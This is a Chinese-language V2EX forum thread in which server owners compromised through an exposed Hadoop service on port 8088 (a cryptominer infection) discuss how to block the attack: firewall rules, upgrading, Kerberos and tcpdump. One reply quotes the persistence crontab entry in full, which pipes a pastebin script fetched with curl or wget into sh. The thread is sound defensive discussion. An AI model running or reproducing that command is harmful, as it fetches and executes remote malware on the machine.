攻击别人服务器是怎么搞的啊

2018-10-13 22:52:36 +08:00
 choice4

我都关了 root 登录 关闭了密码登录只允许秘钥登录 最后好像还是让某位大哥从 8088 进去了好像? cpu 100%(就是一个阿里云的学生机而已,这点性能也要搞我) crontab 里面给我加了个每秒执行的 wget ,

问问老哥们怎么防啊 。我去阿里云安全组设置规则端口地址段访问的时候说最多支持一组授权对象(离开家门之后网络就变了想有多个 ip 可以访问这个阿里云机器)。没搞好。 然后现在就是直接 firewall 把 8088 关了。20 分钟了还没出事。没关端口之前是 10~15 分钟 就会出问题。

这个 firewall 和安全组能特定多个 ip 访问端口吗? 还有啊 有没有办法把这个搞我的地址弄出来啊 然后顺便加个排除他 ip 之类的

9227 次点击
所在节点    Linux
34 条回复
liangzi
2018-10-14 12:52:45 +08:00
46.249.38.186 防火墙屏蔽一下不行吗?这个机器是”大便“的开 22 口了
hdonghong
2018-10-14 15:44:22 +08:00
兄弟怎么解决的。。我也是 crontab 显示:*/23 * * * * (curl -fsSL https://pastebin.com/raw/5bjpjvLP||wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh

终止后仍然是 cpu100%
realkenshinji
2018-10-14 16:34:28 +08:00
@likuku 学习了
choice4
2018-10-14 17:53:36 +08:00
@hdonghong 我这会就是直接把 8088 关了就没事了。你这个跟我这个是不是一样我不清楚啊。我这个是因为 8088 的一个服务有安全漏洞。然后脚本什么的应该就是通过 8088 植入的 我把 8088 关了就好了。具体你根据你自己的实际情况来。不行就把先把 crontab 弄掉。然后把你自定义的防火墙规则全关了得了 。再一步一步排查
forgetandnew
2018-10-15 01:39:20 +08:00
ufw deny 8088
zyp0921
2018-10-15 08:50:49 +08:00
iptables -A INPUT -j DROP
aloof
2018-10-15 09:35:49 +08:00
阿里云的安全规则里面把所有端口全部关完。只开要使用的端口,然后服务器内部的 iptables 再针对已开端口做安全限制
choice4
2018-10-15 09:48:46 +08:00
@aloof 8088 就是我要使用的端口 然后问题就是从这个端口上出的 。firewalld 和安全组我都是只开我自己用的。 但是那个 8088 上跑的程序有安全漏洞。被人黑了
opengps
2018-10-15 10:15:28 +08:00
如果能确定是从 8088 入侵,那就是你这个程序有漏洞
安全组,防火墙只是一道阀门,关闭端口而已,只属于防护
CoderGeek
2018-10-15 10:39:23 +08:00
门罗币 hadoop 的漏洞 。 我之前也遭过
choice4
2018-10-15 10:54:59 +08:00
@CoderGeek 请问你最后是怎么解决呢? 关死端口不太方便我这边。 伪分布式的。所有服务都是在这台机器启动的。 这会在琢磨弄一下一个叫 kerberos 安全认证的东西。看看能不能其效果。 分享一下经验吧谢谢
CoderGeek
2018-10-15 11:07:44 +08:00
@choice4 备份数据 重装 升级 hadoop 版本 开启 kerberos 认证 google 上有解决方法
我那个 留有后门 我清了 crontab 立马就会还原 又开始挖矿 我自己解决不了 只能选择重装了 = = 很伤
CoderGeek
2018-10-15 11:08:13 +08:00
先去看版本吧 有几个版本都有这个问题
qwefdrt
2018-11-23 00:17:55 +08:00
tcpdump 抓包把访问 8088 端口的 IP 抓出来,再用 firewall 禁止掉

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/497404

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX